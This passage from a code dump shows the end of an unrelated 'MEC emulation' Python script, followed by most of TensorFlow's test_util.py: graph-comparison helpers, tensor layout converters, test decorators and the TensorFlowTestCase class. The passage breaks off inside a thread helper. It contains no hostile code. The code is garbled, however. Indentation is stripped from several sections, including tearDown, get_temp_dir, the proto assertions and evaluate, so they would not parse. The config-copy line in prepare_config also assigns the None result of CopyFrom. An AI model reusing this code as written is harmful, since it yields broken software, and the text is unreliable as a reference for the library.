                send_message('hello')
                break
            else:
                print('\nPlease Type "y" to send Hello message\n')
    except KeyboardInterrupt:
        print('\nProgramme Terminated')
        exit(0)
def main():
    """Entry point: clear the terminal and start the MEC emulation program."""
    os.system('clear')
    run_me()
if __name__ == "__main__":
    main()
|
test_util.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import gc
import math
import random
import re
import tempfile
import threading
import numpy as np
import six
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error:
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.client import device_lib
from tensorflow.python.client import session
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import tape # pylint: disable=unused-import
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
@tf_export("test.gpu_device_name")
def gpu_device_name():
  """Returns the name of a GPU device if available or the empty string."""
  for x in device_lib.list_local_devices():
    # SYCL devices are treated as GPUs here as well.
    if x.device_type == "GPU" or x.device_type == "SYCL":
      return compat.as_str(x.name)
  return ""
def assert_ops_in_graph(expected_ops, graph):
  """Assert all expected operations are found.

  Args:
    expected_ops: `dict<string, string>` of op name to op type.
    graph: Graph to check.

  Returns:
    `dict<string, node>` of node name to node.

  Raises:
    ValueError: If the expected ops are not present in the graph.
  """
  graph_def = graph.as_graph_def()
  actual_ops = {}
  for node in graph_def.node:
    if node.name not in expected_ops:
      continue
    if expected_ops[node.name] != node.op:
      raise ValueError("Expected op for node %s is different. %s vs %s" %
                       (node.name, expected_ops[node.name], node.op))
    actual_ops[node.name] = node
  if set(expected_ops.keys()) != set(actual_ops.keys()):
    raise ValueError("Not all expected ops are present. Expected %s, found %s" %
                     (expected_ops.keys(), actual_ops.keys()))
  return actual_ops
@tf_export("test.assert_equal_graph_def")
def assert_equal_graph_def(actual, expected, checkpoint_v2=False):
  """Asserts that two `GraphDef`s are (mostly) the same.

  Compares two `GraphDef` protos for equality, ignoring versions and ordering
  of nodes, attrs, and control inputs.  Node names are used to match up nodes
  between the graphs, so the naming of nodes must be consistent.

  Args:
    actual: The `GraphDef` we have.
    expected: The `GraphDef` we expected.
    checkpoint_v2: boolean determining whether to ignore randomized attribute
        values that appear in V2 checkpoints.

  Raises:
    AssertionError: If the `GraphDef`s do not match.
    TypeError: If either argument is not a `GraphDef`.
  """
  if not isinstance(actual, graph_pb2.GraphDef):
    raise TypeError(
        "Expected tf.GraphDef for actual, got %s" % type(actual).__name__)
  if not isinstance(expected, graph_pb2.GraphDef):
    raise TypeError(
        "Expected tf.GraphDef for expected, got %s" % type(expected).__name__)
  if checkpoint_v2:
    # NOTE: mutates both protos in place to drop randomized V2 attr values.
    _strip_checkpoint_v2_randomized(actual)
    _strip_checkpoint_v2_randomized(expected)
  diff = pywrap_tensorflow.EqualGraphDefWrapper(actual.SerializeToString(),
                                                expected.SerializeToString())
  if diff:
    raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
  """Compares MetaGraphDefs `a` and `b` in unit test class `tester`.

  Collection values are compared proto-by-proto where a proto type is
  registered for the collection key; graph defs are compared with
  assert_equal_graph_def (V2-checkpoint randomized names ignored).

  NOTE: mutates `a` and `b` (collection_def/graph_def fields are cleared).
  """
  # Carefully check the collection_defs
  tester.assertEqual(set(a.collection_def), set(b.collection_def))
  collection_keys = a.collection_def.keys()
  for k in collection_keys:
    a_value = a.collection_def[k]
    b_value = b.collection_def[k]
    proto_type = ops.get_collection_proto_type(k)
    if proto_type:
      a_proto = proto_type()
      b_proto = proto_type()
      # Number of entries in the collections is the same
      tester.assertEqual(
          len(a_value.bytes_list.value), len(b_value.bytes_list.value))
      for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
                                              b_value.bytes_list.value):
        a_proto.ParseFromString(a_value_item)
        b_proto.ParseFromString(b_value_item)
        tester.assertProtoEquals(a_proto, b_proto)
    else:
      # Fix: use assertEqual instead of the deprecated assertEquals alias.
      tester.assertEqual(a_value, b_value)
  # Compared the fields directly, remove their raw values from the
  # proto comparison below.
  a.ClearField("collection_def")
  b.ClearField("collection_def")
  # Check the graph_defs.
  assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
  # Check graph_def versions (ignored by assert_equal_graph_def).
  tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
  # Compared the fields directly, remove their raw values from the
  # proto comparison below.
  a.ClearField("graph_def")
  b.ClearField("graph_def")
  tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
  """Deletes node attrs whose single string value matches the sharded-save
  temp-name pattern, so randomized V2-checkpoint names don't break equality
  comparisons (used by assert_equal_graph_def).  Mutates graph_def in place."""
  for node in graph_def.node:
    delete_keys = []
    for attr_key in node.attr:
      attr_tensor_value = node.attr[attr_key].tensor
      # only a single-element string tensor can hold the randomized name
      if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
        attr_tensor_string_value = attr_tensor_value.string_val[0]
        if (attr_tensor_string_value and
            re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
          delete_keys.append(attr_key)
    # delete after iterating to avoid mutating node.attr during iteration
    for attr_key in delete_keys:
      del node.attr[attr_key]
def IsGoogleCudaEnabled():
  """Returns pywrap_tensorflow.IsGoogleCudaEnabled() (CUDA build flag)."""
  return pywrap_tensorflow.IsGoogleCudaEnabled()
def CudaSupportsHalfMatMulAndConv():
  """Returns pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()."""
  return pywrap_tensorflow.CudaSupportsHalfMatMulAndConv()
def IsMklEnabled():
  """Returns pywrap_tensorflow.IsMklEnabled() (MKL build flag)."""
  return pywrap_tensorflow.IsMklEnabled()
def InstallStackTraceHandler():
  """Installs the native stack-trace handler via pywrap_tensorflow."""
  pywrap_tensorflow.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
  """Converts the input from the NHWC format to NCHW.

  Args:
    input_tensor: a 4- or 5-D tensor, or an array representing shape

  Returns:
    converted tensor or shape array
  """
  # tensor dim -> new axis order
  axis_orders = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
  if isinstance(input_tensor, ops.Tensor):
    order = axis_orders[input_tensor.shape.ndims]
    return array_ops.transpose(input_tensor, order)
  order = axis_orders[len(input_tensor)]
  return [input_tensor[axis] for axis in order]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
  """Transforms the input from the NHWC layout to NCHW_VECT_C layout.

  Note: Does not include quantization or type conversion steps, which should
  be applied afterwards.

  Args:
    input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape

  Returns:
    tensor or shape array transformed into NCHW_VECT_C

  Raises:
    ValueError: if last dimension of `input_shape_or_tensor` is not evenly
      divisible by 4.
  """
  permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
  is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
  temp_shape = (
      input_shape_or_tensor.shape.as_list()
      if is_tensor else input_shape_or_tensor)
  if temp_shape[-1] % 4 != 0:
    raise ValueError(
        "Last dimension of input must be evenly divisible by 4 to convert to "
        "NCHW_VECT_C.")
  # NOTE(review): for a non-tensor input, temp_shape aliases the caller's
  # list, so the next two lines mutate the argument in place — confirm
  # callers rely on / tolerate this.
  temp_shape[-1] //= 4
  temp_shape.append(4)
  permutation = permutations[len(temp_shape)]
  if is_tensor:
    t = array_ops.reshape(input_shape_or_tensor, temp_shape)
    return array_ops.transpose(t, permutation)
  else:
    return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
  """Transforms the input from the NCHW_VECT_C layout to NHWC layout.

  Note: Does not include de-quantization or type conversion steps, which
  should be applied beforehand.

  Args:
    input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape

  Returns:
    tensor or shape array transformed into NHWC

  Raises:
    ValueError: if last dimension of `input_shape_or_tensor` is not 4.
  """
  permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
  is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
  if is_tensor:
    input_shape = input_shape_or_tensor.shape.as_list()
  else:
    input_shape = input_shape_or_tensor
  if input_shape[-1] != 4:
    raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
  permutation = permutations[len(input_shape)]
  # Fold the trailing vector-of-4 dimension back into the channel dimension.
  nhwc_shape = [input_shape[axis] for axis in permutation[:-1]]
  nhwc_shape[-1] *= input_shape[-1]
  if not is_tensor:
    return nhwc_shape
  transposed = array_ops.transpose(input_shape_or_tensor, permutation)
  return array_ops.reshape(transposed, nhwc_shape)
def NCHWToNHWC(input_tensor):
  """Converts the input from the NCHW format to NHWC.

  Args:
    input_tensor: a 4- or 5-D tensor, or an array representing shape

  Returns:
    converted tensor or shape array
  """
  # tensor dim -> new axis order
  axis_orders = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
  if isinstance(input_tensor, ops.Tensor):
    order = axis_orders[input_tensor.shape.ndims]
    return array_ops.transpose(input_tensor, order)
  order = axis_orders[len(input_tensor)]
  return [input_tensor[axis] for axis in order]
# TODO(skyewm): remove this eventually
# pylint: disable=protected-access
def _use_c_api_wrapper(fn, use_c_api, *args, **kwargs):
  """Runs `fn` with ops._USE_C_API temporarily set to `use_c_api`.

  The flag is restored, and the default graph reset, even if `fn` raises.
  """
  prev_value = ops._USE_C_API
  ops._USE_C_API = use_c_api
  try:
    # Reset the default graph so it has the C API enabled. We call
    # reset_default_graph() instead of creating a new default Graph context to
    # make this robust to tests that call reset_default_graph(), which requires
    # that the current default graph isn't nested.
    ops.reset_default_graph()
    fn(*args, **kwargs)
  finally:
    ops._USE_C_API = prev_value
    # Make sure default graph reflects prev_value in case next test doesn't call
    # reset_default_graph().
    ops.reset_default_graph()
# pylint: disable=protected-access
def c_api_and_cuda_enabled():
  """Returns ops._USE_C_API and IsGoogleCudaEnabled() (both flags set)."""
  return ops._USE_C_API and IsGoogleCudaEnabled()
def skip_if(condition):
  """Skips the decorated function if condition is or evaluates to True.

  Args:
    condition: Either an expression that can be used in "if not condition"
      statement, or a callable whose result should be a boolean.

  Returns:
    The wrapped function
  """

  def real_skip_if(fn):

    def wrapper(*args, **kwargs):
      # A callable condition is evaluated lazily at call time.
      should_skip = condition() if callable(condition) else condition
      if not should_skip:
        fn(*args, **kwargs)

    return wrapper

  return real_skip_if
# TODO(skyewm): remove this eventually
def disable_c_api(fn):
  """Decorator for disabling the C API on a test.

  Note this disables the C API after running the test class's setup/teardown
  methods.

  Args:
    fn: the function to be wrapped

  Returns:
    The wrapped function
  """
  def wrapper(*args, **kwargs):
    _use_c_api_wrapper(fn, False, *args, **kwargs)
  return wrapper
# TODO(skyewm): remove this eventually
def enable_c_api(fn):
  """Decorator for enabling the C API on a test.

  Note this enables the C API after running the test class's setup/teardown
  methods.

  Args:
    fn: the function to be wrapped

  Returns:
    The wrapped function
  """
  def wrapper(*args, **kwargs):
    _use_c_api_wrapper(fn, True, *args, **kwargs)
  return wrapper
# This decorator is a hacky way to run all the test methods in a decorated
# class with and without C API enabled.
# TODO(iga): Remove this and its uses once we switch to using C API by default.
def with_c_api(cls):
  """Adds methods that call original methods but with C API enabled.

  Note this enables the C API in new methods after running the test class's
  setup method.  This can be a problem if some objects are created in it
  before the C API is enabled.

  Args:
    cls: class to decorate

  Returns:
    cls with new test methods added
  """
  # If the C API is already enabled, don't do anything. Some tests break if the
  # same test is run twice, so this allows us to turn on the C API by default
  # without breaking these tests.
  if ops._USE_C_API: return cls
  # Add a "...WithCApi" twin for every test method.
  for name, value in cls.__dict__.copy().items():
    if callable(value) and name.startswith("test"):
      setattr(cls, name + "WithCApi", enable_c_api(value))
  return cls
def assert_no_new_tensors(f):
  """Decorator for asserting that no new Tensors persist after a test.

  Mainly useful for checking that code using the Python C API has correctly
  manipulated reference counts.

  Clears the caches that it knows about, runs the garbage collector, then
  checks that there are no Tensor or Tensor-like objects still around. This
  includes Tensors to which something still has a reference (e.g. from missing
  Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
  of the objects has __del__ defined).

  Args:
    f: The test case to run.

  Returns:
    The decorated test case.
  """
  def decorator(self, **kwargs):
    """Finds existing Tensors, runs the test, checks for new Tensors."""
    def _is_tensorflow_object(obj):
      try:
        return isinstance(obj, (
            ops.Tensor,
            variables.Variable,
            tensor_shape.Dimension,
            tensor_shape.TensorShape))
      except ReferenceError:
        # If the object no longer exists, we don't care about it.
        return False
    # Record ids of pre-existing TF objects so only new survivors are reported.
    tensors_before = set(id(obj) for obj in gc.get_objects()
                         if _is_tensorflow_object(obj))
    outside_graph_key = ops.get_default_graph()._graph_key
    with ops.Graph().as_default():
      # Run the test in a new graph so that collections get cleared when it's
      # done, but inherit the graph key so optimizers behave.
      ops.get_default_graph()._graph_key = outside_graph_key
      f(self, **kwargs)
    # Make an effort to clear caches, which would otherwise look like leaked
    # Tensors.
    backprop._zeros_cache.flush()
    context.get_default_context().ones_rank_cache().flush()
    context.get_default_context().scalar_cache().clear()
    gc.collect()
    tensors_after = [
        obj for obj in gc.get_objects()
        if _is_tensorflow_object(obj) and id(obj) not in tensors_before
    ]
    if tensors_after:
      raise AssertionError(("%d Tensors not deallocated after test: %s" % (
          len(tensors_after),
          str(tensors_after),
      )))
  return decorator
def assert_no_garbage_created(f):
  """Test method decorator to assert that no garbage has been created.

  Note that this decorator sets DEBUG_SAVEALL, which in some Python
  interpreters cannot be un-set (i.e. will disable garbage collection for any
  other unit tests in the same file/shard).

  Args:
    f: The function to decorate.

  Returns:
    The decorated function.
  """
  def decorator(self, **kwargs):
    """Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
    gc.disable()
    previous_debug_flags = gc.get_debug()
    # DEBUG_SAVEALL keeps uncollectable objects in gc.garbage for inspection.
    gc.set_debug(gc.DEBUG_SAVEALL)
    gc.collect()
    previous_garbage = len(gc.garbage)
    f(self, **kwargs)
    gc.collect()
    if len(gc.garbage) > previous_garbage:
      logging.error(
          "The decorated test created work for Python's garbage collector, "
          "likely due to a reference cycle. New objects in cycle(s):")
      for i, obj in enumerate(gc.garbage[previous_garbage:]):
        try:
          logging.error(
              "Object %d of %d" % (i, len(gc.garbage) - previous_garbage))
          def _safe_object_str(obj):
            return "<%s %d>" % (obj.__class__.__name__, id(obj))
          logging.error("  Object type: %s" % (_safe_object_str(obj),))
          logging.error("  Referrer types: %s" % (
              ', '.join([_safe_object_str(ref)
                         for ref in gc.get_referrers(obj)]),))
          logging.error("  Referent types: %s" % (
              ', '.join([_safe_object_str(ref)
                         for ref in gc.get_referents(obj)]),))
          logging.error("  Object attribute names: %s" % (dir(obj),))
          logging.error("  Object __str__:")
          logging.error(obj)
          logging.error("  Object __repr__:")
          logging.error(repr(obj))
        except Exception:
          # printing a broken object must not mask the garbage failure below
          logging.error("(Exception while printing object)")
    # This will fail if any garbage has been created, typically because of a
    # reference cycle.
    self.assertEqual(previous_garbage, len(gc.garbage))
    # TODO(allenl): Figure out why this debug flag reset doesn't work. It would
    # be nice to be able to decorate arbitrary tests in a large test suite and
    # not hold on to every object in other tests.
    gc.set_debug(previous_debug_flags)
    gc.enable()
  return decorator
def run_in_graph_and_eager_modes(__unused__=None,
                                 graph=None,
                                 config=None,
                                 use_gpu=False,
                                 force_gpu=False,
                                 reset_test=True,
                                 assert_no_eager_garbage=False):
  """Runs the test in both graph and eager modes.

  Args:
    __unused__: Prevents silently skipping tests.
    graph: Optional graph to use during the returned session.
    config: An optional config_pb2.ConfigProto to use to configure the
      session.
    use_gpu: If True, attempt to run as many ops as possible on GPU.
    force_gpu: If True, pin all ops to `/device:GPU:0`.
    reset_test: If True, tearDown and SetUp the test case again.
    assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
      collector and asserts that no extra garbage has been created when running
      the test in eager mode. This will fail if there are reference cycles
      (e.g. a = []; a.append(a)). Off by default because some tests may create
      garbage for legitimate reasons (e.g. they define a class which inherits
      from `object`), and because DEBUG_SAVEALL is sticky in some Python
      interpreters (meaning that tests which rely on objects being collected
      elsewhere in the unit test file will not work). Additionally, checks that
      nothing still has a reference to Tensors that the test allocated.

  Returns:
    Returns a decorator that will run the decorated test function
    using both a graph and using eager execution.
  """
  # The decorator must be applied with parentheses; a test function passed
  # directly would be truthy here and trip this assertion.
  assert not __unused__, "Add () after run_in_graph_and_eager_modes."

  def decorator(f):
    """Test method decorator."""

    def decorated(self, **kwargs):
      """Decorated the test method."""
      # First pass: graph mode inside a test session.
      with context.graph_mode():
        with self.test_session(graph, config, use_gpu, force_gpu):
          f(self, **kwargs)

      if reset_test:
        # This decorator runs the wrapped test twice.
        # Reset the test environment between runs.
        self.tearDown()
        self._tempdir = None
        self.setUp()

      def run_eager_mode(self, **kwargs):
        # Second pass: eager mode, with device placement mirroring the
        # use_gpu/force_gpu options of the graph-mode run.
        if force_gpu:
          gpu_name = gpu_device_name()
          if not gpu_name:
            gpu_name = "/device:GPU:0"
          with context.device(gpu_name):
            # Bug fix: forward **kwargs like the other branches do;
            # previously they were silently dropped on the force_gpu path.
            f(self, **kwargs)
        elif use_gpu:
          # TODO(xpan): Support softplacement and gpu by default when available.
          f(self, **kwargs)
        else:
          with context.device("/device:CPU:0"):
            f(self, **kwargs)

      if assert_no_eager_garbage:
        run_eager_mode = assert_no_new_tensors(
            assert_no_garbage_created(run_eager_mode))

      with context.eager_mode():
        with ops.Graph().as_default():
          run_eager_mode(self, **kwargs)

    return decorated

  return decorator
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
  """Returns whether TensorFlow can access a GPU.

  Args:
    cuda_only: limit the search to CUDA gpus.
    min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
      CUDA compute capability required, or None if no requirement.

  Returns:
    True iff a gpu device of the requested kind is available.
  """

  def compute_capability_from_device_desc(device_desc):
    # TODO(jingyue): The device description generator has to be in sync with
    # this file. Another option is to put compute capability in
    # DeviceAttributes, but I avoided that to keep DeviceAttributes
    # target-independent. Reconsider this option when we have more things like
    # this to keep in sync.
    # LINT.IfChange
    match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
    # LINT.ThenChange(//tensorflow/core/\
    # common_runtime/gpu/gpu_device.cc)
    if not match:
      return 0, 0
    return int(match.group(1)), int(match.group(2))

  for device_attrs in device_lib.list_local_devices():
    if device_attrs.device_type == "GPU":
      # A CUDA GPU counts only when it meets the requested capability.
      if min_cuda_compute_capability is None:
        return True
      capability = compute_capability_from_device_desc(
          device_attrs.physical_device_desc)
      if capability >= min_cuda_compute_capability:
        return True
    elif device_attrs.device_type == "SYCL" and not cuda_only:
      return True
  return False
@contextlib.contextmanager
def device(use_gpu):
  """Uses gpu when requested and available."""
  chosen = "/device:GPU:0" if (use_gpu and is_gpu_available()) else "/device:CPU:0"
  with ops.device(chosen):
    yield
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
  def __init__(self, methodName="runTest"):  # pylint: disable=invalid-name
    """Initializes per-test bookkeeping (threads, temp dir, cached session)."""
    super(TensorFlowTestCase, self).__init__(methodName)
    # Threads created via checkedThread(); tearDown verifies they joined.
    self._threads = []
    # Lazily created unique temp dir; see get_temp_dir().
    self._tempdir = None
    # Session reused across test_session() calls when no explicit graph is
    # given; cleared in setUp/tearDown.
    self._cached_session = None
  def setUp(self):
    """Resets graph state and seeds all RNGs for test isolation."""
    self._ClearCachedSession()
    random.seed(random_seed.DEFAULT_GRAPH_SEED)
    np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
    # Note: The following line is necessary because some test methods may error
    # out from within nested graph contexts (e.g., via assertRaises and
    # assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
    # under certain versions of Python. That would cause
    # ops.reset_default_graph() to throw an exception if the stack were not
    # cleared first.
    ops._default_graph_stack.reset()  # pylint: disable=protected-access
    ops.reset_default_graph()
    random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
  def _eval_tensor(self, tensor):
    # Evaluates one tensor-like object to a numpy value (eager mode).
    # Dispatch order matters: the specific TF types are checked before the
    # generic callable() fallback.
    if tensor is None:
      return None
    elif isinstance(tensor, ops.EagerTensor):
      return tensor.numpy()
    elif isinstance(tensor, resource_variable_ops.ResourceVariable):
      return tensor.read_value().numpy()
    elif callable(tensor):
      # A zero-arg callable producing tensors (or a nest of them) is invoked
      # and its result evaluated recursively.
      return self._eval_helper(tensor())
    else:
      raise ValueError("Unsupported type %s." % type(tensor))
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
  # pylint: disable=g-doc-return-or-yield
  @contextlib.contextmanager
  def test_session(self,
                   graph=None,
                   config=None,
                   use_gpu=False,
                   force_gpu=False):
    """Returns a TensorFlow Session for use in executing tests.

    This method should be used for all functional tests.

    This method behaves different than session.Session: for performance reasons
    `test_session` will by default (if `graph` is None) reuse the same session
    across tests. This means you may want to either call the function
    `reset_default_graph()` before tests, or if creating an explicit new graph,
    pass it here (simply setting it with `as_default()` won't do it), which will
    trigger the creation of a new session.

    Use the `use_gpu` and `force_gpu` options to control where ops are run. If
    `force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
    `use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
    possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned
    to the CPU.

    Example:
    ```python
    class MyOperatorTest(test_util.TensorFlowTestCase):
      def testMyOperator(self):
        with self.test_session(use_gpu=True):
          valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
          result = MyOperator(valid_input).eval()
          self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
          invalid_input = [-1.0, 2.0, 7.0]
          with self.assertRaisesOpError("negative input not supported"):
            MyOperator(invalid_input).eval()
    ```

    Args:
      graph: Optional graph to use during the returned session.
      config: An optional config_pb2.ConfigProto to use to configure the
        session.
      use_gpu: If True, attempt to run as many ops as possible on GPU.
      force_gpu: If True, pin all ops to `/device:GPU:0`.

    Returns:
      A Session object that should be used as a context manager to surround
      the graph building and execution code in a test case.
    """
    # Guard against the test runner treating this helper itself as a test.
    if self.id().endswith(".test_session"):
      self.skipTest("Not a test.")

    def prepare_config(config):
      """Returns a config for sessions.

      Args:
        config: An optional config_pb2.ConfigProto to use to configure the
          session.

      Returns:
        A config_pb2.ConfigProto object.
      """
      if config is None:
        config = config_pb2.ConfigProto()
        config.allow_soft_placement = not force_gpu
        config.gpu_options.per_process_gpu_memory_fraction = 0.3
      elif force_gpu and config.allow_soft_placement:
        # Copy before mutating: the caller's config must not be altered.
        config = config_pb2.ConfigProto().CopyFrom(config)
        config.allow_soft_placement = False
      # Don't perform optimizations for tests so we don't inadvertently run
      # gpu ops on cpu
      config.graph_options.optimizer_options.opt_level = -1
      config.graph_options.rewrite_options.constant_folding = (
          rewriter_config_pb2.RewriterConfig.OFF)
      config.graph_options.rewrite_options.arithmetic_optimization = (
          rewriter_config_pb2.RewriterConfig.OFF)
      return config

    if graph is None:
      # No explicit graph: reuse (or lazily create) the cached session.
      if self._cached_session is None:
        self._cached_session = session.Session(
            graph=None, config=prepare_config(config))
      sess = self._cached_session
      with sess.graph.as_default(), sess.as_default():
        if force_gpu:
          # Use the name of an actual device if one is detected, or '/device:GPU:0'
          # otherwise
          gpu_name = gpu_device_name()
          if not gpu_name:
            gpu_name = "/device:GPU:0"
          with sess.graph.device(gpu_name):
            yield sess
        elif use_gpu:
          yield sess
        else:
          with sess.graph.device("/cpu:0"):
            yield sess
    else:
      # Explicit graph: a fresh, non-cached session scoped to this context.
      with session.Session(graph=graph, config=prepare_config(config)) as sess:
        if force_gpu:
          # Use the name of an actual device if one is detected, or '/device:GPU:0'
          # otherwise
          gpu_name = gpu_device_name()
          if not gpu_name:
            gpu_name = "/device:GPU:0"
          with sess.graph.device(gpu_name):
            yield sess
        elif use_gpu:
          yield sess
        else:
          with sess.graph.device("/cpu:0"):
            yield sess
  # pylint: enable=g-doc-return-or-yield
  class _CheckedThread(object):
    """A wrapper class for Thread that asserts successful completion.

    This class should be created using the TensorFlowTestCase.checkedThread()
    method.
    """

    def __init__(self, testcase, target, args=None, kwargs=None):
      """Constructs a new instance of _CheckedThread.

      Args:
        testcase: The TensorFlowTestCase for which this thread is being created.
        target: A callable object representing the code to be executed in the
          thread.
        args: A tuple of positional arguments that will be passed to target.
        kwargs: A dictionary of keyword arguments that will be passed to target.
      """
      self._testcase = testcase
      self._target = target
      self._args = () if args is None else args
      self._kwargs = {} if kwargs is None else kwargs
      # The real thread runs _protected_run so exceptions can be captured
      # and re-reported on join() in the main thread.
      self._thread = threading.Thread(target=self._protected_run)
      self._exception = None
      # Tracks whether join() was ever called; checked in check_termination.
      self._is_thread_joined = False

    def _protected_run(self):
      """Target for the wrapper thread. Sets self._exception on failure."""
      try:
        self._target(*self._args, **self._kwargs)
      except Exception as e:  # pylint: disable=broad-except
        # Stash the exception; it is surfaced as a test failure in join().
        self._exception = e

    def start(self):
      """Starts the thread's activity.

      This must be called at most once per _CheckedThread object. It arranges
      for the object's target to be invoked in a separate thread of control.
      """
      self._thread.start()

    def join(self):
      """Blocks until the thread terminates.

      Raises:
        self._testcase.failureException: If the thread terminates with due to
          an exception.
      """
      self._is_thread_joined = True
      self._thread.join()
      if self._exception is not None:
        self._testcase.fail("Error in checkedThread: %s" % str(self._exception))

    def is_alive(self):
      """Returns whether the thread is alive.

      This method returns True just before the run() method starts
      until just after the run() method terminates.
